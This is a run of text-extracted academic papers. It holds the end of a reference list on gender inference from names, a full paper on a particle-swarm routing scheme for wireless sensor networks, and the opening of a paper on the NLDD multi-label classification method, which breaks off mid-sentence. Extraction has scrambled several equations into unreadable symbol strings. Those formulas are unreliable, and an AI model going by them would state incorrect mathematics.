https://github.com/ropensci/gender. Naldi F, Luzi D, Valente A, Vannini Parenti I. 2005. Scientific and technological performance by gender. In: Moed HF, Glänzel W, Schmoch U, eds. Handbook of quantitative science and technology research: the use of publication and patent statistics in studies of S&T systems. Dordrecht: Springer Netherlands, 299–314. Vanetta M. 2014. Gender detection. Available at http://codingnews.info/post/gender- detection.html. Vasilescu B, Serebrenik A, Filkov V. 2015. A data set for social diversity studies of github teams. In: Proceedings of the 12th working conference on mining software repositories, MSR’15. Piscataway: IEEE Press, 514–517. Wais K. 2016. Gender prediction methods based on first names with genderizeR. The R Journal 8(1):17–37. West JD, Jacquet J, King MM, Correll SJ, Bergstrom CT. 2013. The role of gender in scholarly authorship. PLOS ONE 8(7):e66212 DOI 10.1371/journal.pone.0066212. Santamaría and Mihaljević (2018), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.156 29/29 https://peerj.com ftp://ftp.heise.de/pub/ct/listings/0717-182.zip ftp://ftp.heise.de/pub/ct/listings/0717-182.zip https://github.com/GenderGapSTEM-PublicationAnalysis/name-gender-inference http://dx.doi.org/10.1371/journal.pone.0165367 http://dx.doi.org/10.1108/00012530810908193 https://github.com/ropensci/gender http://codingnews.info/post/gender-detection.html http://codingnews.info/post/gender-detection.html http://dx.doi.org/10.1371/journal.pone.0066212 http://dx.doi.org/10.7717/peerj-cs.156 work_qto5jhdf2nehzjcza67fh65wse ---- Your Paper's Title Starts Here: Please Center Gathering Correlated Data in Wireless Sensor Networks Using a Heuristic Algorithm Yuexian Wang, Cheng Chew Lim School of Electrical and Electronic Engineering, the University of Adelaide, Adelaide, Australia, {jwang, cclim}@eleceng.adelaide.edu.au Abstract. We propose a routing scheme for data gathering and aggregation in wireless sensor networks. The scheme aims to optimise an aggregation tree in order to minimise the energy dissipation of data aggregation and transmission. A modified particle swarm optimisation algorithm is developed in the proposed scheme. In addition, the routing scheme uses a generic data aggregation model which accommodates different correlation conditions. The performance of the proposed scheme is evaluated and compared with three other existing data gathering algorithms. Simulation results show that the proposed scheme outperforms existing algorithms in terms of energy consumption and that the scheme can adapt to the change of network connectivity and data correlation conditions. Keywords: Sensor networks, data aggregation, particle swarm optimisation, correlation coefficient, energy consumption 1. Introduction In wireless sensor networks, a large number of sensor nodes are scattered in an observed region and left unattended after deployment, and all nodes in the network are thus energy-constrained. Energy consumption, scalability, and load balancing are important requirements for many data gathering sensor network applications. The tree-based data gathering algorithm is proposed for achieving development in this area, such as the shortest path tree algorithm [1], the minimum spanning tree algorithm [2] and the shallow light tree algorithm [3]. In a tree-based network, sensor nodes are organised into a tree structure where data aggregation is performed at intermediate nodes along the tree and a concise representation of the data is transmitted to the root node. Therefore, the research problem is to find out a routing tree with data aggregation to achieve minimum energy expense. This problem is an NP-complete problem [4,] because it can be reducible to a weighted set cover problem in graph theory, which has been shown to be NP complete [5]. In this paper, we propose a routing scheme for data gathering and aggregation in wireless sensor networks. The scheme utilises a heuristic algorithm to optimise data traffic and the transmission structure in terms of energy consumption. Using this heuristic algorithm, significant data traffic can be reduced since more reasonable aggregator nodes to eliminate data redundancy can be selected. In order to reduce the energy consumption for data transmission, the heuristic algorithm optimises transmission structure as well. In addition, a generic aggregation model which does not depend on any specific relationship among correlated data is exploited in order to adapt to a variety of applications. The remainder of this paper is organised as follows: Section 2 gives the introduction to the standard particle swarm optimisation algorithm. The system models of our new scheme are presented in Section 3. The details of the proposed modified particle swarm optimisation algorithm for the routing scheme are described in Section 4. Section 5 discusses the performance evaluation and simulation results and Section 6 concludes the paper. 2. Standard Particle Swarm Optimisation Algorithm The particle swarm optimisation (PSO) algorithm stems from the simulation of a simplified society model, and it was proposed as a typical heuristic algorithm inspired by the behaviour of bird flocking [6]. The PSO was used to search optimal or near-optimal solutions in large search space. Assume that in a D-dimensional searching space m particles compose a swarm and fly with a certain velocity, where the particle i denotes a D-dimensional vector },...,,{ 21 idiii xxxx  , i=1, 2, ..., m. The performance of i x is assessed by its fitness value which is calculated through substituting i x into the objective function. The motion of particles changes according to the following equations: )()()()( 21 1 t id t gbest t id t ibest t id t id xprandcxprandcvv    , (1) 11   t id t id t id vxx , (2) Where t is the iteration number, id v denotes the velocity of the particle i in the dth dimensional (1 ≤ d ≤ D) particle swarm space, id x represents the particle i current position, ibest p is its best previous position, and gbest p is the best position among all particles in the population. rand() is a random function with a range [0, 1]. 1 c and 2 c are learning factors used to accelerate the motion speed of particles. The inertia weight, ω is a user-specified parameter that controls, mailto:cclim%7d@eleceng.adelaide.edu.au with 1 c and 2 c , the impact of previous historical values of particle velocities on its current one. A large inertia weight facilitates global exploration while a small inertia weight facilitates fine-tuning local search. 3. System Models A.Network Model. One base station and n sensors are assumed to be distributed uniformly in a field and quasi- stationary. The base station sends a query and k (k  n) sensors respond to that query. Wireless links are considered bidirectional and symmetric so that any two nodes can communicate using the same transmission power levels only if they are within range of each other. Sensor nodes are homogenous and arbitrarily allocated with equal initial energy. In addition, nodes are not location-aware and left unattended after deployment. B.Data Correlation and Aggregation Model. We assume that there is correlation among the data generated by the k sensors. To possibly accommodate a wide range of scenarios, we abstract data redundancy among two sensor nodes using a single value ρ, termed the correlation coefficient. Assume that data amount after aggregation is not less than any of its inputs and not more than the sum of all inputs. Let iv R and jv R be the amount of data generated by the node i v and j v in response to a query. Without loss of generality, if ji vv RR  , the output ),( ji vvR after data aggregation is: ji vvji RRvvR )1(),(  , (3) C.Energy Model. We adopt both the free-space propagation model to approximate path loss sustained because of wireless channel transmission [7]. The energy expanded by the radio for transmitting and receiving an l bit message over a distance d, is given by: 2 ),( dllEdlE fselecTx  , (4) elecRx lElE )( (5) Where Tx E is the energy dissipated in the transmitter, elec E is the per bit energy dissipation for running the transceiver circuitry, fs  is the amplifier parameter for the free space propagation model, and Rx E is the radio expends of receiver. 4. Problem Formulation Given the set of source node S and the base station d in wireless sensor networks G(V, E), our objective is to find a connected subgraph G′(V′, E′)  G, where S  V′, and d  V′, in order to minimise the energy consumption for transmitting data from all source nodes to the base station. The objective function is formulated as follows:   ' ),(min Vv iv i i dvR  , (6) Where ),( dv i  is the total weight of edges on path from node i v to base station on constructed aggregation tree. In wireless networks, the weight of each edge can be considered as the energy expended for per unit data communication and data aggregation. iv R is the amount of data generated by node i v . 5. PSO Modified by Genetic Algorithm for Routing with Aggregation The standard PSO algorithm is the real valued PSO, and it cannot operate addition or subtraction directly on the path. Hence, the standard PSO algorithm should be extended to deal with the discrete optimisation problems which require the ordering or arranging of discrete elements, eg. the routing tree with aggregation problem. Facing the problems, we propose a PSO algorithm which is modified by the genetic algorithm [8] in order to address the discrete nature of our optimisation problem. The core of this algorithm is an equivalent form of velocity and displacement formulae combining the thought of genetic algorithm. Hence, Eq. 1and Eq. 2 are replaced by Eq. 7 and Eq. 8. )()( 1 t id t gbest t id t ibest t id t id xpxpvv    , (7) 11   t id t id t id vxx , (8) Where the operator  represents a composition, and the operator  indicates information exchange which is implemented by crossover. A.Encoding. Encoding involves coding paths serial numbers into a feasible solution (or a position) in the search space. We represent the individual, for a specific aggregation tree, as a string of node numbers. The length of each individual is always equal to the number of relay nodes. A routing scheme for a network with 7 relay nodes, and one base station, is shown in Fig. 1(a) and the corresponding particle is shown in Fig. 1(b). (a) Routing tree (b) Individual (Solution representation) Fig.1 Encoding a routing tree as an individual B.Population Initialisation. In general, there are two ways to generate the initial population, heuristic initialisation and random initialisation. For most large scale problems, such as network communication design, random initialisation has better effect on global optimal solutions. The main idea of our work is that the correspondence of nodes behaviour through local optimisation is greater than the correspondence of nodes behaviour in random initialisation. The SPT algorithm and the MST algorithm have good results in the initial population, when correlation coefficient is equal to 0 and 1 respectively. Hence the initial population should include the shortest path tree and the minimum spanning tree. C.Fitness Function. We define the fitness value as the energy consumption of the network, and our metric for total energy dissipation takes into consideration including the transmit energy, the receive energy and aggregation energy. D.Selection. The function of selection operator is to select individuals which have relative large fitness values with relative large probabilities from their parent generation. The PSO algorithm then puts the chosen individuals in the offspring generation and waits for further evolution implemented by crossover and mutation. We adopt the ranking selection [9] as a part of implementation of the modified PSO algorithm in this paper. E.Crossover. The operator  in Eq. 7 indicates information exchange which is similar to the operation of crossover in the genetic algorithm, so we use the crossover as the equivalent form of the  operation. Because of the requirement of encoding, source nodes are known at the stage of crossover. First, we randomly select a gene in the locus of the same source node between the optimal individual and a generic individual and put it into the same locus of the offspring. We then make the same selection at the locus of the relay node which is indicated by the previous chosen gene. This process is repeated until the base station is found. For the rest nodes which are not used, genes from the same locus between the two individuals are selected randomly. Fig. 2 is an example for the crossover operation. Fig.2 Crossover between the optimal individual and the generic individual. F.Mutation. Multiplying ω by k id v in Eq. 7, indicating that a particle searches toward a new space, is similar to the operation of mutation in the genetic algorithm, so we use the mutation as the equivalent form of k id v . We select a node 3 to substitute for node 6 from set Ω where the node 3 has the same previous hop node 7 and next hop node 8 as the nod 6. This process is illustrated by Fig. 3. Fig.3 Examples of the mutation operation. G.Addition. The addition operation indicates the sum of several processing steps. Through orderly executing the equivalent subitems in the PSO algorithm, we can obtain the effect of addition. In the equivalence of the addition, the outputs of previous steps are the inputs of latter steps. According to Eq. 7 and Eq. 8, the computation sequence is from right to left. Applying two crossover operations and one mutation operation to a generic aggregation tree, we can acquire an offspring and then put it in the population for the next iteration. 6. Simulation Results and Discussions In our simulation, average energy dissipation and the maximum run (the first node dies) are metrics used to compare the PSO algorithm with three existing tree-based data gathering algorithms: the shortest path tree (SPT) algorithm, the minimum spanning tree (MST) algorithm, and the shallow light tree (SLT) algorithm. A square region of size 50m×50m is uniformly divided into 100 grids, and each sensor is deployed in one grid. Since the coordinate of each sensor is determined by a random function which can generate uniformly distributed random numbers within the interval [0, 50], the sensor nodes are randomly distributed. Each node is equipped with 1J initial energy at the beginning of the simulation. Every node transmits a 4000 bit message per round to the base station. The calculation of energy dissipation in the simulations is based on Eq. 4 and Eq. 5. We use the same parameters as that in [10]: elec E =50nJ/bit and fs  =10pJ/bit/ 2 m . Moreover, the per bit energy dissipation for aggregating data is set as da E =15nJ/bit/signal and the transmission range is set as R =20 m . (a) (b) Fig.4 Influence of the number of source nodes on (a) mean of energy consumption versus the number when ρ approaches 0 and (b) mean of energy consumption versus the number of source nodes when ρ approaches 1 Fig.4 (a) shows the mean of energy consumption per round versus the number of source nodes using an aggregation tree with the PSO algorithm, the MST algorithm, the SPT algorithm, and the SLT algorithm. Clearly, when ρ approaches 0 the PSO algorithm performs as well as the SPT algorithm and reduces energy consumption significantly compared with the MST algorithm and the SLT algorithm. A reduction of average energy consumption of about 40% and 50% can be obtained by the PSO algorithm as well as the SPT algorithm over the SLT algorithm and the MST algorithm, respectively. In a network with poor correlation, the PSO algorithm reduces to the SPT algorithm, and data should be transmitted directly to the base station via the shortest paths instead of aggregator nodes by detouring, since there is no redundancy among the data, and aggregation at any relay node is not efficient in reducing the data amount. When ρ approaches 1 as illustrated in Fig.4 (b), the PSO algorithm performs better than all other algorithms with regard to the mean of energy consumption. A reduction of average energy consumption of about 5%, 5%, and 40% can be obtained by the PSO algorithm over the MST algorithm, the SLT algorithm, and the SPT algorithm respectively. The performance of the MST algorithm is the closest to that of the PSO algorithm. However, since some nodes within one hop to the base station would waste energy for detouring to aggregator nodes rather than transmitting directly to the base station, the MST algorithm cannot achieve the optimal performance. Because the nodes can not sufficiently take advantage of data aggregation to reduce the transmission task, the SPT algorithm expends the most energy compared with the three other algorithms. The SLT algorithm can balance between data aggregation and direct transmission, but it gets the benefit implicitly. Hence the energy consumption of the PSO algorithm increases more slowly than the SLT algorithm with the increase in the number of source nodes. Fig.5(a) illustrates the average energy consumption of the four algorithms when the number of source node k=15. The costs of all algorithms decrease with the increase in ρ, the correlation coefficient. This exemplifies that data aggregation in sensor networks can greatly benefit the routing performance by reducing redundancy among correlated data. In addition, the PSO algorithm evidently outperforms other algorithms in the energy consumption with the increase in the correlation coefficient. A reduction of average energy consumption of about 25%, 30%, and 35% can be obtained by the PSO algorithm over the SLT algorithm, the MST algorithm, and the SPT algorithm, respectively. When ρ is small, the SPT algorithm performs well. However, it does not benefit from the increase in ρ as it cannot efficiently perform data aggregation to eliminate redundancy among data. In the contrast, the MST algorithm gets the worst performance when ρ is small since it pursues data aggregation but data are actually low correlated. The PSO algorithm performs much better than the SLT algorithm since the PSO algorithm recalculates total energy dissipation in every stage to get perfect matching and thus can adapt to the correlation among nodes. We can see from Fig. 5(b) that the maximum run of all algorithms grows with the increase in ρ. The main reason is that data aggregation can significantly reduce traffic by eliminating redundancy among correlated data and hence consume less energy. Since aggregator nodes receive data from different nodes and perform data aggregation, they always die earlier than others due to the heavy load. When ρ < 0.8, the SPT algorithm outperforms other algorithms markedly because data are opportunistically aggregated and the amount of data for aggregation is not large. The SPT algorithm does not benefit well when ρ increases from 0.8 to 1 due to insufficient data aggregation. Because the MST algorithm and the SLT algorithm prefer to detour to pursue data aggregation, large amount of data may be aggregated on nodes near the sources, and these aggregator nodes will exhaust energy earlier than that in the PSO algorithm. In addition, the maximum run of the PSO algorithms drops dramatically when ρ varies from 0 to 0.2 because the PSO algorithm can find out more aggregator nodes to share the same paths and the load of aggregator nodes becomes heavier. (a) (b) Fig.5 Influence of correlation coefficient on (a) mean of energy consumption versus the correlation coefficient when k=15 and (b) The number of run versus the correlation coefficient when k=15 7. Conclusions We propose an energy-efficient data gathering and aggregation routing scheme that caters for the energy challenges in wireless sensor networks. The particle swarm optimisation algorithm is utilised to optimise a joint objective between data traffic and transmission structure. The scheme also adopts a generic data aggregation model which accommodates different correlation conditions. Simulation results show that the particle swarm optimisation algorithm outperforms its counterparts in terms of energy consumption. Although there is a small sacrifice in the maximum run due to the heavy load of aggregator nodes, the particle swarm optimisation algorithm can be regarded as a good tradeoff since it can save energy and adapt to the change of network connectivity and data correlation conditions. References [1] W. Heinzelman, J. Kulik, and H. Balakrishnan, “Adaptive protocols for information dissemination in wireless sensor networks,” in Proc. ACM MobiCom, Aug. 1999, pp. 174-185. [2] R. C. Prim, “Shortest connection networks and some generalization,” Bell System Technical, vol. 36, no. 6, pp. 1389-1401, 1957. [3] A. Goel and K. Munagala, “Balancing steiner trees and shortest path trees online,” in Proc. 11th ACM-SIAM Symp. on Discrete Algorithms, Jan. 2000, pp. 562-563. [4] R.Cristescu, B. Beferull-Lozano, and M. Vetterli, “On network correlated data gathering,” in Proc. IEEE INFOCOM, vol. 4, Mar. 2004, pp. 2571-2582. [5] M. R. Garey and D. Johnson, Computers and intractability: A guide to the theory of NP-Completeness. W. H. Freeman, 1979. [6] J. Kennedy and R. C. Eberhart, “Particle Swarm Optimization,” in the IEEE Conf. on Neural Networks, IV, 1995, pp. 1942-1948. [7] H. Xia, H. L. Bertoni, and L. R. Maciel, “Radio propagation characteristics for line-of-sight microcellular and personal communications,” Antenna and Propagation, vol. 41, no. 10, pp. 1439-1447, Oct. 1993. [8] Z. Michalewicz, Genetic Algorithms + Data Structures = Evolution Programs, 3rd ed., Springer-Verlag, 1996. [9] J. E. Baker, “Adaptive selection methods for genetic algorithms,” in Proc. the 1st International Conference on Genetic Algorithms, 1985, pp. 101-111. [10] W. R. Heinzelman, A. Chandrakasan, and H. Balakrishnan, “An application-specific protocol architecture for wireless microsensor networks,” Wireless Communications, vol. 1, no. 4, pp. 660-670, October 2002. work_qtojh7qkjvfmjcxu45bmddfw3y ---- Submitted 7 August 2019 Accepted 4 November 2019 Published 9 December 2019 Corresponding author Hyukjun Gweon, hgweon@uwo.ca Academic editor Diego Amancio Additional Information and Declarations can be found on page 17 DOI 10.7717/peerj-cs.242 Copyright 2019 Gweon et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Nearest labelset using double distances for multi-label classification Hyukjun Gweon1, Matthias Schonlau2 and Stefan H. Steiner2 1 Department of Statistical and Actuarial Sciences, University of Western Ontario, London, Ontario, Canada 2 Department of Statistics and Actuarial Science, University of Waterloo, Waterloo, Ontario, Canada ABSTRACT Multi-label classification is a type of supervised learning where an instance may belong to multiple labels simultaneously. Predicting each label independently has been criticized for not exploiting any correlation between labels. In this article we propose a novel approach, Nearest Labelset using Double Distances (NLDD), that predicts the labelset observed in the training data that minimizes a weighted sum of the distances in both the feature space and the label space to the new instance. The weights specify the relative tradeoff between the two distances. The weights are estimated from a binomial regression of the number of misclassified labels as a function of the two distances. Model parameters are estimated by maximum likelihood. NLDD only considers labelsets observed in the training data, thus implicitly taking into account label dependencies. Experiments on benchmark multi-label data sets show that the proposed method on average outperforms other well-known approaches in terms of 0/1 loss, and multi- label accuracy and ranks second on the F-measure (after a method called ECC) and on Hamming loss (after a method called RF-PCT). Subjects Data Mining and Machine Learning, Data Science Keywords Multi-label classification, Label correlations, Nearest neighbor INTRODUCTION In multi-label classification, an instance can belong to multiple labels at the same time. This is different from multi-class or binary classification, where an instance can only be associated with a single label. For example, a newspaper article talking about electronic books may be labelled with multiple topics such as business, arts and technology simultaneously. Multi- label classification has been applied in many areas of application including text (Schapire & Singer, 2000; Godbole & Sarawagi, 2004), image (Boutell et al., 2004; Zhang & Zhou, 2007), music (Li & Ogihara, 2003; Trohidis et al., 2008) and bioinformatics (Elisseeff & Weston, 2001). A labelset for an instance is the set of all labels that are associated with that instance. Approaches for solving multi-label classification problems may be categorized into either problem transformation methods or algorithm adaptation methods (Tsoumakas & Katakis, 2007). Problem transformation methods transform a multi-label problem into one or more single-label problems. For the single-label classification problems, binary or multi-class classifiers are used. The results are combined and transformed back into a multi-label representation. Algorithm adaptation methods, on the other hand, modify specific learning algorithms directly for multi-label problems. Tsoumakas, Katakis How to cite this article Gweon H, Schonlau M, Steiner SH. 2019. Nearest labelset using double distances for multi-label classification. PeerJ Comput. Sci. 5:e242 http://doi.org/10.7717/peerj-cs.242 https://peerj.com/computer-science mailto:hgweon@uwo.ca https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.242 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.242 & Vlahavas (2010), Madjarov et al. (2012) and Zhang & Zhou (2014) give overviews of multi-label algorithms and evaluation metrics. In this article, we propose a new problem transformation approach to multi-label classification. Our proposed approach applies the nearest neighbor method to predict the label with the shortest distance in the feature space. However, because we have multiple labels, we additionally consider the shortest (Euclidean) distance in the label space where the input of the test instance in the label space consists of probability outputs obtained by independent binary classifiers. We then find the labelset that minimizes the expected label misclassification rate as a function of both feature space and label space distances, thus exploiting high-order interdependencies between labels. The nonlinear function is estimated using maximum likelihood. The effectiveness of the proposed approach is evaluated with various multi-label data sets. Our experiments show that the proposed method performs on average better on standard evaluation metrics (Hammming loss, 0/1 loss, multi-label accuracy and the F-measure) than other commonly used algorithms. The rest of this article is organized as follows: in ‘Related work’ we review previous work on multi-label classification. In ‘The nearest labelset using double distances approach’, we present the details of the proposed method. In ‘Experimental Evaluation’, we report on experiments that compare the proposed method with other algorithms on standard metrics. In ‘Discussion’ we discuss the results. In ‘Conclusion’, we draw conclusions. RELATED WORK In this section, we briefly review the multi-label approaches that are existing competitors to the proposed method. There are several approaches to classifying multi-label data. The most common approach, binary relevance (BR) (Zhang & Zhou, 2005; Tsoumakas & Katakis, 2007), transforms a multi-label problem into separate binary problems. That is, using training data, BR constructs a binary classifier for each label independently. For a test instance, the prediction set of labels is obtained simply by combining the individual binary results. In other words, the predicted labelset is the union of the results predicted from the L binary models. This approach requires one binary model for each label. The method has been adapted in many domains including text (Gonçalves & Quaresma, 2003), music (Li & Ogihara, 2003) and images (Boutell et al., 2004). One drawback of the basic binary approach is that it does not account for any correlation that may exist between labels, because the labels are modelled independently. Taking correlations into account is often critical for prediction in multi-label problems (Godbole & Sarawagi, 2004; Ji et al., 2008). Subset-Mapping (SMBR) (Schapire & Singer, 1999; Read et al., 2011) is a method related to BR. For a new instance, first labels are predicted by the binary outputs of BR. Then, final prediction is made by the training labelset with the shortest Hamming distance to the predicted labelset. SMBR makes predictions by selecting labelsets observed in the training data. SBMR is a nearest neighbor approach in the label space—from the set of predicted labels to the sets of labels observed in the training data—with Hamming distance as the distance metric. Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 2/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.242 An extension of binary relevance is Classifier Chain (CC) (Read et al., 2011). CC fits labels sequentially using binary classifiers. Labels already predicted are included as features in subsequent classifiers until all labels have been fit. Including previous predictions as features ‘‘chains’’ the classifiers together and also takes into account potential label correlations. However, the order of the labels in a chain affects the predictive performances. Read et al. (2011) also introduced the ensemble of classifier chains (ECC), where multiple CC are built with re-sampled training sets. The order of the labels in each CC is randomly chosen. The prediction label of an ECC is obtained by the majority vote of the CC models. Label Powerset learning (LP) transforms a multi-label classification into a multi- class problem (Tsoumakas & Katakis, 2007). In other words, LP treats each labelset as a single label. The transformed problem requires a single classifier. Although LP captures correlations between labels, the number of classes in the transformed problem increases exponentially with the number of original labels. LP learning can only choose observed labelsets for predictions (Tsoumakas & Katakis, 2007; Read, Pfahringer & Holmes, 2008). The random k-labelsets method, (RAKEL) (Tsoumakas & Vlahavas, 2007), is a variation on the LP approach. In a multi-label problem with L different labels, RAKEL employs m multi-class models each of which considers k(≤L) randomly chosen labels, rather than the entire labelset. For a test instance, the prediction labelset is obtained by the majority vote of the results based on the m models. RAKEL overcomes the problem that the number of multinomial classes increases exponentially as a function of the number of labels. It also considers interdependencies between labels by using multi-class models with subsets of the labels. A hierarchy of multi-label classifiers (HOMER) (Tsoumakas, Katakis & Vlahavas, 2008) constructs a tree-shaped hierarchy by partitioning the labels recursively into smaller disjoint subsets (i.e., nodes) using a balanced clustering algorithm, which extends the k means algorithm with an additional constraint on the size of each cluster. After that, HOMER constructs a multi-label classifier for the labelsets in each node. For the prediction of a new instance, HOMER follows a top-down recursive process from the root. A classifier on a non-root node is called only if the prediction of its parent node is positive. The final labelset is determined by the positive leaves (i.e., labels) whose parent nodes are all positive. A popular lazy learning algorithm based on the k Nearest Neighbours (kNN) approach is MLKNN (Zhang & Zhou, 2007). Like other kNN-based methods, MLKNN identifies the k nearest training instances in the feature space for a test instance. Then for each label, MLKNN estimates the prior and likelihood for the number of neighbours associated with the label. Using Bayes theorem, MLKNN calculates the posterior probability from which a prediction is made. The Conditional Bernoulli Mixtures (CBM) (Li et al., 2016) approach transforms a multi-label problem into a mixture of binary and multi-class problems. CBM divides the feature space into K regions and learns a multi-class classifier for the regional components as well as binary classifiers in each region. The posterior probability for a labelset is obtained by mixing the multi-class and multiple binary classifiers. The model parameters are estimated using the Expectation Maximization algorithm. Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 3/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.242 (1,1,0) (1,0,1) (0,0,1) (0,0,0) y 1 y 2 y 3 𝑝 𝑦(1) 𝐷y1 𝐷y2 𝑦 (3 ) 𝐷y3 Figure 1 An illustration of the label space when L = 3. Each vertex represents a labelset. The inner point represents a fitted vector of an instance. Dyi represents the distance between p̂ and yi. Full-size DOI: 10.7717/peerjcs.242/fig-1 Multi-target classification approaches may also be used for multi-label classification. A number of multi-target learning methods use the predictive clustering tree (PCT) (Blockeel, Raedt & Ramon, 1998) as the base classifier. Random forest of predictive clustering trees (RF- PCT) (Kocev et al., 2007) has been shown to be competitive (Madjarov et al., 2012). RF-PCT is a tree-based ensemble method using PCTs as base classifiers. Different PCTs are constructed from different bootstrap samples and random subsets of the features. THE NEAREST LABELSET USING DOUBLE DISTANCES APPROACH Hypercube view of a multi-label problem In multi-label classification, we are given a set of possible output labels L={1,2,...,L}. Each instance with a feature vector x∈Rd is associated with a subset of these labels. Equivalently, the subset can be described as y=(y(1),y(2),...,y(L)), where y(i) =1 if label i is associated with the instance and y(i) =0 otherwise. A multi-label training data set is described as T ={(xi,yi)},i=1 ,{2,...,N}. Any labelset y can be described as a vertex in the L-dimensional unit hypercube (Tai & Lin, 2012). Each component y(i) of y represents an axis of the hypercube. As an example, Fig. 1 illustrates the label space of a multi-label problem with three labels (y(1), y(2), y(3)). Assume that the presence or absence of each label is modeled independently with a probabilistic classifier. For a new instance, the classifiers provide the probabilities, p(1), ..., p(L), that the corresponding labels are associated with the instance. Using the probability outputs, we may obtain a L-dimensional vector p̂=(p(1),p(2),...,p(L)). Every element of p̂ has a value from 0 to 1 and the vector p̂ is an inner point in the hypercube (see Fig. 1). Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 4/20 https://peerj.com https://doi.org/10.7717/peerjcs.242/fig-1 http://dx.doi.org/10.7717/peerj-cs.242 Given p̂ the prediction task is completed by assigning the inner point to a vertex of the cube. For the new instance, we may calculate the Euclidean distance, Dyi, between p̂ and each yi (i.e., the labelset of the ith training instance). In Fig. 1, three training instances y1, y2 and y3 and the corresponding distances are shown. A small distance Dyi indicates that yi is likely to be the labelset for the new instance. Nearest labelset using double distances (NLDD) In addition to computing the distance in the label space, Dyi, we may also obtain the (Euclidean) distance in the feature space, denoted by Dxi. The proposed method, NLDD, uses both Dx and Dy as predictors to find a training labelset that minimizes the expected loss. For each test instance, we define loss as the number of misclassified labels out of L labels. The expected loss is then Lθ where θ =g(Dx,Dy) represents the probability of misclassifying each label. The predicted labelset, ŷ∗, is the labelset observed in the training data that minimizes the expected loss: ŷ∗=argmin y∈T Lg(Dx,Dy) (1) The loss follows a binomial distribution with L trials and a parameter θ. We model θ=g(Dx,Dy) using binomial regression. Specifically, log ( θ 1−θ ) =β0+β1Dx+β2Dy (2) where β0, β1 and β2 are the model parameters. Greater values for β1 and β2 imply that θ becomes more sensitive to the distances in the feature and label spaces, respectively. The misclassification probability decreases as Dx and Dy approach zero. A test instance with Dx=Dy=0 has a duplicate instance in the training data (i.e., with identical features). The predicted probabilities for the test instance are either 0 or 1 and the match the labels of the duplicate training observation. For such a ‘‘double’’-duplicate instance (i.e., Dx =Dy =0), the probability of misclassification is 1/(1+e−β0) > 0. As expected, the uncertainty of a test observation with a ‘‘double-duplicate’’ training observation is greater than zero. This is not surprising: duplicate training observations do not necessarily have the same response, and neither do double-duplicate observations. The model in Eq. (2) implies g(Dx,Dy)=1/(1+e−(β0+β1Dx+β2Dy)). Because log ( θ 1−θ ) is a monotone transformation of θ and L is a constant, the minimization problem in (1) is equivalent to ŷ∗=argmin (x,y)∈T β1Dx+β2Dy (3) That is, NLDD predicts by choosing the labelset of the training instance that minimizes the weighted sum of the distances. For prediction, the only remaining issue is how to estimate the weights. Estimating the relative weights of the two distances The weights β0,β1 and β2 can be estimated using binomial regression. Binomial regression can be fit by running separate logistic regressions, one for each of the L labels. To run Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 5/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.242 1The dataset is split equally for training and testing. An unequal split is not desirable: adding more instances to the internal training set may improve the performance of individual probabilistic classifiers. However, this would lead to the decrease of the number of distance pairs that are needed for the binomial regression modeling (# distance pairs = 2(# instance in the internal validation set)). That is, reducing the size of the validation set will decrease the amount of data used for binomial regression. Algorithm 1 The training process of NLDD Input: training data T , number of labels L Output: probabilistic classifiers h(i), binomial regression g Split T into T1 and T2 for i=1 to L do train probabilistic classifier h(i) based on T train probabilistic classifier h(i)∗ based on T1 end for S,W ←∅ for each instance in T2 do obtain p̂=(h(1)∗ (x),...,h (L) ∗ (x)) for each instance in T1 do compute Dx and Dy W ←W ∪(Dx,Dy) end for find m1,m2∈W update S←S∪{m1,m2} end for Fit log ( θ 1−θ ) =β0+β1Dx+β2Dy to S Obtain g :S→ θ̂= e f̂ 1+e f̂ where f̂ = β̂0+β̂1Dx+β̂2Dy Algorithm 2 The classification process of NLDD Input: new instance x, binomial model g, probabilistic classifiers h(i), training data T of size N Output: multi-label classification vector ŷ for j=1 to N do compute p̂=(h(1)(x),...,h(L)(x)) compute Dxj and Dyj obtain θ̂j ←g(Dxj,Dyj ) end for return ŷ←argmin yj∈T θ̂j the regressions Dx and Dy need to be computed on the training data. For this purpose we split the training data (T) equally into an internal training data set, T1, and an internal validation data set, T2.1 We next fit a binary classifier to each of the L labels separately and obtain the labelset predictions (i.e., probability outcomes) for the instances in T2. In principle, each observation in T2 can be paired with each observation in T1, creating a (Dx,Dy) pair, and the regressions can be run on all possible pairs. Note that matching any single instance in T2 to those in T1 results in N/2 distance pairs. However, most of the pairs are uninformative because the distance in either the feature space or the label space is very large. Since candidate labelsets for the final prediction will have a small Dy and a small Gweon et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.242 6/20 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.242 1 2 3 4 5 6 1 2 3 4 5 6 Dx D y mi1 mi2 Wiy Figure 2 An illustration of how to identify mi1 and mi2 for N = 20.T1 and T2 contain 10 instances each. The 10 points in the scatter plot were obtained by calculating Dx and Dy between a single instance in T2 and the 10 instances in T1. In this example two points have the lowest distance in Dy and are candidates for mi2. Among the candidates, the point with the lowest Dx is chosen. Full-size DOI: 10.7717/peerjcs.242/fig-2 Dx, it is reasonable to focus more on the behavior of the loss especially at small values of Dx and Dy than considering the loss at the entire range of the distances. Moreover, since T2 contains N/2 instances, the number of possible pairs is potentially large (N 2/4). Therefore, to reduce computational complexity, for each instance we only identify two pairs: the pair with the smallest distance in x and the pair with the smallest distance in y. In case of ties in one distance, the pair with the smallest value in the other distance is chosen. More formally, we identify the first pair mi1 by mi1 = argmin (Dx,Dy)∈Wix Dy where Wix is the set of pairs that are tied; i.e., that each corresponds to the minimum distance in Dx. Similarly, the second pair mi2 is found by mi2 = argmin (Dx,Dy)∈Wiy Dx. where Wiy is the set of labels that are tied with the minimal distance in Dy. Figure 2 illustrates an example of how to identify mi1 and mi2 for N =20. Our goal was to identify the instance with the smallest distance in x and 